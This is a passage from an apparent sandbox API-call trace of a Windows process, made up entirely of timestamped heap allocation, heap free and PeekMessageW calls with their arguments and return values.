hHeap=0x8a0000) returned 1 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.883] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.885] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.886] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 